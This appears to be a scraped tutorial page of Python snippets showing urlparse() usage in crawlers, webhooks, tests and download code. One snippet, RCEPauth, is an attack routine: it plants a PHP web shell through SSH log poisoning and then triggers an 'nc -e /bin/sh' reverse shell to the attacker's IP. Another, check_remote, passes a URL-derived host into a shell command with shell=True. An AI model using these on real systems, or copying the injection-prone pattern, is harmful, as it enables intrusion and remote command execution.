我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用urllib.parse.urlparse()。
def ygdy8_list_page(url, is_index=False): """??????????? Args: url (string): url is_index (bool): ?????? """ celery_logger.info('ygdy8_list_page url: {}'.format(url)) try: u = urlparse(url) response = requests.get(url, headers={'Host': u.netloc}) html_page = response.content.decode('gbk', 'ignore') movies, pages = ygdy8.parse_list_page(html_page, is_index) for movie in movies: movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie) ygdy8_movie_page.delay(movie_url) dir_name = os.path.dirname(u.path) for page in pages[1:]: page_url = '{}://{}{}/{}'.format(u.scheme, u.netloc, dir_name, page) ygdy8_list_page.delay(page_url, False) except Exception as exc: celery_logger.exception(exc)
def ygdy8_movie_page(url): """?????ygdy8????? Args: url (string): ????(eg: http://www.ygdy8.net/html/gndy/jddy/20170804/54635.html) """ celery_logger.info('ygdy8_movie_page url: {}'.format(url)) try: sid = calc_md5(url.encode('utf8')) record = Entity.get(sid) if record: return u = urlparse(url) response = requests.get(url, headers={'Host': u.netloc}) html_page = response.content.decode('gbk', 'ignore') movie = ygdy8.YGDY8(html_page) movie.parse_html() save_ygdy8_data.delay(sid, url, movie.to_json()) except Exception as exc: celery_logger.exception(exc)
def s80_movie_list(url): """?????80s Args: url (string): url """ celery_logger.info('s80_movie_list url: {}'.format(url)) try: u = urlparse(url) response = requests.get(url, headers={'Host': u.netloc}) movies, next_page = s80.parse_list_page(response.text) for movie in movies: movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie) s80_movie_page.delay(movie_url) if next_page: next_page_url = '{}://{}{}'.format(u.scheme, u.netloc, next_page) s80_movie_list.delay(next_page_url) except Exception as exc: celery_logger.exception(exc)
def prompt_extractor(self, item): extractor = extractors[item.data(Qt.UserRole)] inputs = [] if not assert_installed(self.view, **extractor.get('depends', {})): return if not extractor.get('pick_url', False): files, mime = QFileDialog.getOpenFileNames() for path in files: inputs.append((path, Path(path).stem)) else: text, good = QInputDialog.getText(self.view, ' ', 'Input an URL:') if text: url = urlparse(text) inputs.append((url.geturl(), url.netloc)) if inputs: wait = QProgressDialog('Extracting .proto structures...', None, 0, 0) wait.setWindowTitle(' ') self.set_view(wait) self.worker = Worker(inputs, extractor) self.worker.progress.connect(self.extraction_progress) self.worker.finished.connect(self.extraction_done) self.worker.start()
def make_next_param(login_url, current_url): ''' Reduces the scheme and host from a given URL so it can be passed to the given `login` URL more efficiently. :param login_url: The login URL being redirected to. :type login_url: str :param current_url: The URL to reduce. :type current_url: str ''' l = urlparse(login_url) c = urlparse(current_url) if (not l.scheme or l.scheme == c.scheme) and \ (not l.netloc or l.netloc == c.netloc): return urlunparse(('', '', c.path, c.params, c.query, '')) return current_url
def run_webhook(self, webhook_url, **options): """ Convenience method for running bots in webhook mode :Example: >>> if __name__ == '__main__': >>> bot.run_webhook(webhook_url="https://yourserver.com/webhooktoken") Additional documentation on https://core.telegram.org/bots/api#setwebhook """ loop = asyncio.get_event_loop() loop.run_until_complete(self.set_webhook(webhook_url, **options)) if webhook_url: url = urlparse(webhook_url) app = self.create_webhook_app(url.path, loop) host = os.environ.get('HOST', '0.0.0.0') port = int(os.environ.get('PORT', 0)) or url.port web.run_app(app, host=host, port=port)
def fetch(self, uri, filename): if super().needs_login(): super().perform_login(self.cfg, self.headers) parts = urlparse(uri) mod_id = parts.netloc session = super().getSession() r = session.get( "http://www.nexusmods.com/skyrim/Files/download/" + mod_id, params={"game_id": "110"}, allow_redirects=True, headers=self.headers ) if r.status_code != 200: raise RuntimeError("Failed downloading " + uri) j = r.json() super().download_file(uri, j[0]["URI"], self.headers, filename)
def get_sendgrid_request_message(cfg, keyid, hex, user_email): url_prefix = urljoin( cfg.config.megserver_hostname_url, os.path.join(cfg.config.meg_url_prefix, "revoke") ) params = urlencode([("keyid", keyid), ("token", hex)]) parsed = list(urlparse(url_prefix)) parsed[4] = params revocation_link = urlunparse(parsed) message = Mail() message.add_to(user_email) message.set_from(cfg.config.sendgrid.from_email) message.set_subject(cfg.config.sendgrid.subject) message.set_html(EMAIL_HTML.format(keyid=keyid, link=revocation_link)) return message
def determine_git_domain(origin_url): #Handles both SSH and HTTPS #No support for relative URL path, only (sub)domain: https://docs.gitlab.com/omnibus/settings/configuration.html #HTTPS URLS url = urlparse(origin_url) if url.netloc: return url.netloc #SSH URLS matchObj = re.search(r'@+(?P<ssh_git_url>.*)?:', origin_url) try: if matchObj.group('ssh_git_url'): return matchObj.group('ssh_git_url') except: return None
def get_netloc(url): """Return the netloc from a URL. If the input value is not a value URL the method will raise an Ansible filter exception. :param url: the URL to parse :type url: ``str`` :returns: ``str`` """ try: netloc = urlparse(url).netloc except Exception as exp: raise errors.AnsibleFilterError( 'Failed to return the netloc of: "%s"' % str(exp) ) else: return netloc
def get_netorigin(url): """Return the netloc from a URL. If the input value is not a value URL the method will raise an Ansible filter exception. :param url: the URL to parse :type url: ``str`` :returns: ``str`` """ try: parsed_url = urlparse(url) netloc = parsed_url.netloc scheme = parsed_url.scheme except Exception as exp: raise errors.AnsibleFilterError( 'Failed to return the netorigin of: "%s"' % str(exp) ) else: return '%s://%s' % (scheme, netloc)
def check_remote(url): # TODO need a better solution o = urlparse.urlparse(url) host = o.netloc while "@" in host: host = host[host.find("@")+1:] while ":" in host: host = host[:host.find(":")] cmd = list() cmd.append("ping") if platform.system().lower().startswith("win"): cmd.append("-n") cmd.append("1") cmd.append("-w") cmd.append("1000") else: cmd.append("-c1") cmd.append("-t1") cmd.append(host) p = Popen(" ".join(cmd), stdout=PIPE, stderr=PIPE, shell=True) out, err = p.communicate() return len(err) == 0
def configure(self): opts = self.options use_cfg = opts.use_config if use_cfg is None: return url = urlparse(opts.use_config_dir) kwargs = {} if url.scheme: kwargs['download'] = True kwargs['remote_url'] = url.geturl() # search first with the exact url, else try with +'/wafcfg' kwargs['remote_locs'] = ['', DEFAULT_DIR] tooldir = url.geturl() + ' ' + DEFAULT_DIR for cfg in use_cfg.split(','): Logs.pprint('NORMAL', "Searching configuration '%s'..." % cfg) self.load(cfg, tooldir=tooldir, **kwargs) self.start_msg('Checking for configuration') self.end_msg(use_cfg)
def _should_use_proxy(url, no_proxy=None): """Determines whether a proxy should be used to open a connection to the specified URL, based on the value of the no_proxy environment variable. @param url: URL @type url: basestring or urllib2.Request """ if no_proxy is None: no_proxy_effective = os.environ.get('no_proxy', '') else: no_proxy_effective = no_proxy urlObj = urlparse_.urlparse(_url_as_string(url)) for np in [h.strip() for h in no_proxy_effective.split(',')]: if urlObj.hostname == np: return False return True
def generate_path(self, endpoint_desc, session, request_params): path = endpoint_desc.get('path', '') url = list(urlparse(self.base_path)) url[2] = '/'.join([url[2].rstrip('/'), path.lstrip('/')]) url.pop() path = urlunsplit(url) hooks = [getattr(plugin, 'prepare_path') for plugin in self._plugins if hasattr(plugin, 'prepare_path')] self.logger.debug("Calling {0} plugin hooks...".format('prepare_path')) for func in hooks: try: path = await func(endpoint_desc=endpoint_desc, session=session, request_params=request_params, path=path) except Exception as ex: # pragma: no cover self.logger.error("Exception executing {0}".format(repr(func))) self.logger.exception(ex) raise return path
def RCEPauth(temp): global port global ip outTime(2, "Just hit ctrl + c when asked for a password") parsed = urlparse(url) sysCMD = "ssh" + " '<pre><?php echo system($_GET['cmd']); exit; ?>'@" + parsed.netloc print(sysCMD) os.system(sysCMD) temp = temp.replace('etc/passwd', 'var/log/auth.log&cmd=') if not ip: ip = input("Enter your IP address: : ") if not port: port = input("Enter local port for target to connect back to: ") outTime(3, "Remember to start a listener in another shell") input("Hit enter when listen is created") cmd = "nc+-e+%2Fbin%2Fsh+" + ip + "+" + port try: r = openURL(temp + cmd, headers) outTime(2, "Shell closed") print(65*"-") except KeyboardInterrupt: sys.exit()
def __init__(self, table="footprints", database_url=os.getenv("DATABASE_URL"), geometry_column="geom"): if database_url is None: raise Exception("Database URL must be provided.") urlparse.uses_netloc.append('postgis') urlparse.uses_netloc.append('postgres') url = urlparse.urlparse(database_url) self._pool = ThreadedConnectionPool( 1, 16, database=url.path[1:], user=url.username, password=url.password, host=url.hostname, port=url.port) self._log = logging.getLogger(__name__) self.table = table self.geometry_column = geometry_column
def check_urls(self, resources_to_check, results=None, hash_results=None): def get_domain(x): return urlparse(x[0]).netloc if results is None: # pragma: no cover resources_to_check = list_distribute_contents(resources_to_check, get_domain) results = retrieve(resources_to_check) if self.testsession: serialize_results(self.testsession, results) hash_check = list() for resource_id in results: url, err, http_last_modified, hash, force_hash = results[resource_id] if hash: dbresource = self.session.query(DBResource).filter_by(id=resource_id, run_number=self.run_number).one() if dbresource.md5_hash != hash: # File changed hash_check.append((url, resource_id, force_hash)) if hash_results is None: # pragma: no cover hash_check = list_distribute_contents(hash_check, get_domain) hash_results = retrieve(hash_check) if self.testsession: serialize_hashresults(self.testsession, hash_results) return results, hash_results
def get_url_query(self, url): if not isinstance(url, str): url = str(url) parsed_url = urlparse(url) url_query = parse_qsl(parsed_url.fragment or parsed_url.query) # login_response_url_query can have multiple key url_query = dict(url_query) token = self.get_token_from_url(url) if token: url_query["access_token"] = token return url_query ############################################################################
def mdn_cmd(self, listener, sender, target, args): arg_list = args.split() if len(arg_list) < 1: self.messenger.msg(target, "https://developer.mozilla.org/ - Mozilla Developer Network") return http = urllib3.PoolManager() base_url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=" mdn_url = "%20site%3Adeveloper.mozilla.org" full_url = base_url+args+mdn_url o = urlparse(full_url) r = http.request("GET", o.geturl()) pd = json.loads(r.data.decode('UTF-8')) firsturl = pd['responseData']['results'][0]['url'] self.messenger.msg(target, firsturl)
def sendResponse(reportID: str, actionName: str, respURL: str) -> None: if actionName == 'body': text = getBody(reportID) elif actionName == 'metadata': text = getMetadata(reportID) else: raise ValueError("Button %s not defined!" % actionName) ephemeralJson = {'response_type': 'ephemeral', 'replace_original': False, 'text': text} # Even if an attacker gets the verification token, we will still refuse to post the data to non-slack.com URLs if urlparse(respURL).hostname.endswith('slack.com'): requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8')) else: ephemeralJson['text'] = (('Failed URL check, respURL=%s which is not on the slack.com domain name! This check ' 'is theoretically not required (since we verify the verification token), but done as ' 'an extra defensive step. To disable this, edit slackServer.py in the project root.') % respURL) requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8')) raise URLError("respURL=%s not on slack.com domain!" % respURL)
def parseURL(url: str) -> URLParts: """ Parse the given URL into a URLParts named tuple and normalize any relevant domain names """ try: parsed = urlparse(url) if parsed.hostname: hostname = parsed.hostname else: hostname = '' if config.hostnameSanitizers: for regex, result in config.hostnameSanitizers.items(): if re.compile(regex).match(hostname): domain = result break else: domain = hostname else: domain = hostname return URLParts(domain=domain, path=parsed.path, queries=dict(parse_qsl(parsed.query))) except ValueError: return None
def isProgramURL(url: str, acceptAll=True) -> bool: """ Whether the given url is a program URL """ domain = urlparse(url).netloc.split(':')[0].lower() if not config.domains: return True if config.domains or (not acceptAll): try: ip = socket.gethostbyname(domain) except (socket.gaierror, UnicodeError): ip = None if domain and isinstance(config.domains, list): return (any([domain.endswith(hostname.lower()) for hostname in config.domains]) and ip != '127.0.0.1') return False if acceptAll: return True
def getVulnDomains(self) -> List[str]: """ Get a list of the vulnerable domains (used for duplicate detection-not an accurate process) """ def getDomains(urls: List[str]) -> List[str]: return [urlparse(url).hostname for url in urls] botComments = self._getAllCommentsByUsername(config.apiName) reporterComments = ([self.__getBody(x) for x in self._getAllCommentsByUsername(self.getReporterUsername())] + getLinks(self.getReportBody())) # First attempt at getting a list of vulnerable domains, see if it is ever set in the metadata for botComment in botComments: body = self.__getBody(botComment) try: metadataSection = body.split('Metadata')[-1] return getDomains([extractJson(metadataSection)['vulnDomain']]) except (KeyError, TypeError): pass allURLs = [link for comment in reporterComments for link in getLinks(comment)] # If not, just return the list of all the urls return getDomains(allURLs)
def parse_stream_url(self, url): logger.debug('Extracting URIs from %s', url) extension = urlparse(url).path[-4:] if extension in ['.mp3', '.wma']: logger.debug('Got %s', url) return [url] # Catch these easy ones results = [] playlist, content_type = self._get_playlist(url) if playlist: parser = find_playlist_parser(extension, content_type) if parser: playlist_data = StringIO.StringIO(playlist) try: results = [u for u in parser(playlist_data) if u and u != url] except Exception as exp: # pylint: disable=broad-except logger.error('TuneIn playlist parsing failed %s', exp) if not results: logger.debug('Parsing failure, ' 'malformed playlist: %s', playlist) elif content_type: results = [url] logger.debug('Got %s', results) return list(OrderedDict.fromkeys(results))
def get_app(self, static_serve=False) -> web.Application: """ Create aiohttp application for webhook handling """ app = get_app(self, static_serve=static_serve) # webhook handler webhook_path = urlparse(self.webhook).path app.router.add_post(webhook_path, self.webhook_handle) # viber webhooks registering if self._unset_webhook_on_cleanup: app.on_cleanup.append(lambda a: a.bot.api.unset_webhook()) if self._set_webhook_on_startup: app.on_startup.append(lambda a: a.bot.set_webhook_on_startup()) return app
def check_headers(self, headers): etag = headers.get('etag') if etag is not None: if etag.startswith(('W/', 'w/')): if etag.startswith('w/'): warn(HTTPWarning('weak etag indicator should be upcase.'), stacklevel=4) etag = etag[2:] if not (etag[:1] == etag[-1:] == '"'): warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4) location = headers.get('location') if location is not None: if not urlparse(location).netloc: warn(HTTPWarning('absolute URLs required for location header'), stacklevel=4)
def test_valid_file_upload(admin_client): task = Task.objects.create(slug='test') data = b"a" url = reverse('task', kwargs={'task_id': task.id}) zip_file = SimpleUploadedFile( "task1.zip", data, content_type="application/zip") response = admin_client.post(url, {'zip_file': zip_file}) assert response.status_code == 302 assert urlparse(response.url).path == url submissions = TaskSubmission.objects.all() assert len(submissions) == 1 submission = submissions[0] with open(submission.get_submission_path(), 'rb') as f: assert data == f.read()
def query_params(self, value=None): """ Return or set a dictionary of query params :param dict value: new dictionary of values """ if value is not None: return URL._mutate(self, query=unicode_urlencode(value, doseq=True)) query = '' if self._tuple.query is None else self._tuple.query # In Python 2.6, urlparse needs a bytestring so we encode and then # decode the result. if not six.PY3: result = parse_qs(to_utf8(query), True) return dict_to_unicode(result) return parse_qs(query, True)
def dashboard(global_config, **settings): """ WSGI entry point for the Flask app RQ Dashboard """ redis_uri = os.environ.get('REDIS_URL', 'redis://localhost:6379/0') p = parse.urlparse(redis_uri) host, port = p.netloc.split(':') db = len(p.path) > 1 and p.path[1:] or '0' redis_settings = { 'REDIS_URL': redis_uri, 'REDIS_DB': db, 'REDIS_HOST': host, 'REDIS_PORT': port, } app = Flask(__name__, static_url_path="/static", static_folder=resource_filename("rq_dashboard", "static") ) app.config.from_object(rq_dashboard.default_settings) app.config.update(redis_settings) app.register_blueprint(rq_dashboard.blueprint) return app.wsgi_app
def test_auth_url(self): perms = ['email', 'birthday'] redirect_url = 'https://localhost/facebook/callback/' expected_url = 'https://www.facebook.com/dialog/oauth?' + urlencode( dict(client_id=self.app_id, redirect_uri=redirect_url, scope=','.join(perms))) actual_url = facebook.auth_url(self.app_id, redirect_url, perms=perms) # Since the order of the query string parameters might be # different in each URL, we cannot just compare them to each # other. expected_url_result = urlparse(expected_url) actual_url_result = urlparse(actual_url) expected_query = parse_qs(expected_url_result.query) actual_query = parse_qs(actual_url_result.query) self.assertEqual(actual_url_result.scheme, expected_url_result.scheme) self.assertEqual(actual_url_result.netloc, expected_url_result.netloc) self.assertEqual(actual_url_result.path, expected_url_result.path) self.assertEqual(actual_url_result.params, expected_url_result.params) self.assertEqual(actual_query, expected_query)
def __getDownloadLink(self, link): if link == 'SproutCore.xml': data=requests.get('http://docs.sproutcore.com/feeds/' + link).text e = xml.etree.ElementTree.fromstring(data) version = e.findall('version')[0].text for atype in e.findall('url'): return {'url': atype.text, 'version':version} server = self.serverManager.getDownloadServer(self.localServer) data = requests.get(server.url+link).text e = xml.etree.ElementTree.fromstring(data) version = e.findall('version')[0].text for atype in e.findall('url'): if not self.localServer == None: disassembled = urlparse(atype.text) filename, file_ext = splitext(basename(disassembled.path)) url = self.localServer if not url[-1] == '/': url = url + '/' url = url + filename + file_ext return {'url': url, 'version':version} if atype.text.find(server.url) >= 0: return {'url': atype.text, 'version':version}
def fuzz_one(fqdn): original = Fqdn.query.filter_by(fqdn=fqdn).first() _url = original.fqdn # no scheme, assuming HTTP if '://' not in _url: _url = 'http://' + _url url = urlparse(_url) fuzzed = DomainFuzz(url.netloc) fuzzed.generate() checks = { 'banners': True, 'geoip': True, 'whois': True, 'ssdeep': True, 'mxcheck': False } for domain in fuzzed.domains: augment.delay(domain, url, original.id, checks)
def _isurl(self, path): """Test if path is a net location. Tests the scheme and netloc.""" # We do this here to reduce the 'import numpy' initial import time. if sys.version_info[0] >= 3: from urllib.parse import urlparse else: from urlparse import urlparse # BUG : URLs require a scheme string ('http://') to be used. # www.google.com will fail. # Should we prepend the scheme for those that don't have it and # test that also? Similar to the way we append .gz and test for # for compressed versions of files. scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path) return bool(scheme and netloc)
def get_type(key, value): if type(value) == type([]): return 'array' value = value[0] if value.isdigit(): return 'int' try: float(value) return 'float' except: pass # url check u = urlparse.urlparse(value) if u.scheme and u.netloc: return 'url' try: j = json.loads(value) if type(j) == type([]) or type(j) == type({}): return 'json' except: pass return 'str'
def test_authorize_url(self): """ :return: """ request_params = { 'client_id': self.client_id, 'redirect_uri': self.redirect_url, "forcelogin": "false" } parse_result = parse.urlparse(self.oauth2_client.authorize_url) query_params = dict(parse.parse_qsl(parse_result.query)) self.assertEqual(parse_result.hostname, "api.weibo.com") self.assertEqual(parse_result.path, "/oauth2/authorize") self.assertDictEqual(query_params, request_params)
def send_tweet_with_media(): # read the tweet's status status = input("status: ") path = "" while not path and not os.path.exists(path): path = input('file to upload:\n') # read the most common input formats path = urlparse(path).path.strip(" \"'") async with aiofiles.open(path, 'rb') as media: # optimize pictures if PIL is available if PIL: media = await process_media(media, path) uploaded = await client.upload_media(media, chunk_size=2**18, chunked=True) media_id = uploaded.media_id await client.api.statuses.update.post(status=status, media_ids=media_id)
def parse_path(self): """ Returns a 6 tuple-based object with the following items: ======== === ================================= Property Pos Meaning ======== === ================================= scheme 0 URL scheme specifier netloc 1 Network location part path 2 Hierarchical path params 3 Parameters for last path element query 4 Query component fragment 5 Fragment identifier ======== === ================================= """ return urlparse(self.path)
def check_template(ctx, _, value): """ Checks the template to be valid template :param ctx: app context :param value: the parameter value :return: """ if not value: # TODO: get list and show raise ctx.abort() else: url = urlparse(value) if not url.netloc: url = url._replace(netloc='github.com') if url.path[-4:] == '.git': url = url._replace(path=url.path[:-4]) path = os.path.join(os.environ['HOME'], '.flactory/templates', url.netloc, url.path) if os.path.isdir(path): return path # TODO: if not exist pull it automatically repr_name = click.style("[{}] {}".format(url.netloc, url.path[:-4]), bold=True) raise ctx.fail(repr_name + " doesn't exist.")
def _getresponse(self, resp): if resp.status_code == 202: status_url = resp.getheader('content-location') if not status_url: raise Exception('Empty content-location from server') status_uri = urlparse(status_url).path resource = Resource(uri=status_uri, api=self._api, logger = self._logger).get() retries = 0 MAX_RETRIES = 3 resp_status = resource.response.status_code while resp_status != 303 and retries < MAX_RETRIES: retries += 1 new_resp.get() time.sleep(5) if retries == MAX_RETRIES: raise Exception('Max retries limit reached without success') location = status.conn.getresponse().getheader('location') return Resource(uri=urlparse(location).path, api=self._api, logger = self._logger).get() return Response (self, resp)
def file_to_url(self, file_rel_path): """Convert a relative file path to a file URL.""" _abs_path = os.path.abspath(file_rel_path) return urlparse.urlparse(_abs_path, scheme='file').geturl()
def download(self, source, dest): """ Download an archive file. :param str source: URL pointing to an archive file. :param str dest: Local path location to download archive file to. """ # propogate all exceptions # URLError, OSError, etc proto, netloc, path, params, query, fragment = urlparse(source) if proto in ('http', 'https'): auth, barehost = splituser(netloc) if auth is not None: source = urlunparse((proto, barehost, path, params, query, fragment)) username, password = splitpasswd(auth) passman = HTTPPasswordMgrWithDefaultRealm() # Realm is set to None in add_password to force the username and password # to be used whatever the realm passman.add_password(None, source, username, password) authhandler = HTTPBasicAuthHandler(passman) opener = build_opener(authhandler) install_opener(opener) response = urlopen(source) try: with open(dest, 'wb') as dest_file: dest_file.write(response.read()) except Exception as e: if os.path.isfile(dest): os.unlink(dest) raise e # Mandatory file validation via Sha1 or MD5 hashing.
def parse_url(self, url): return urlparse(url)
def main(initial_url, articles_limit, interval, output_file): """ Main loop, single thread """ minutes_estimate = interval * articles_limit / 60 print("This session will take {:.1f} minute(s) to download {} article(s):".format(minutes_estimate, articles_limit)) print("\t(Press CTRL+C to pause)\n") session_file = "session_" + output_file load_urls(session_file) # load previous session (if any) base_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(initial_url)) initial_url = initial_url[len(base_url):] pending_urls.append(initial_url) counter = 0 while len(pending_urls) > 0: try: counter += 1 if counter > articles_limit: break try: next_url = pending_urls.pop(0) except IndexError: break time.sleep(interval) article_format = next_url.replace('/wiki/', '')[:35] print("{:<7} {}".format(counter, article_format)) scrap(base_url, next_url, output_file, session_file) except KeyboardInterrupt: input("\n> PAUSED. Press [ENTER] to continue...\n") counter -= 1 print("Finished!") sys.exit(0)
def __getattr__(self, item): if item == 'layers': if not self._layers: return [self.path] return [self.path + '/' + l for l in self._layers] elif item == 'qualified_name': url = urlparse(self.url) return ('{url.netloc}{url.path}' .format(url=url) .replace('@', '.') .replace(':', '.') .replace('/', '.') .replace('*', '.'))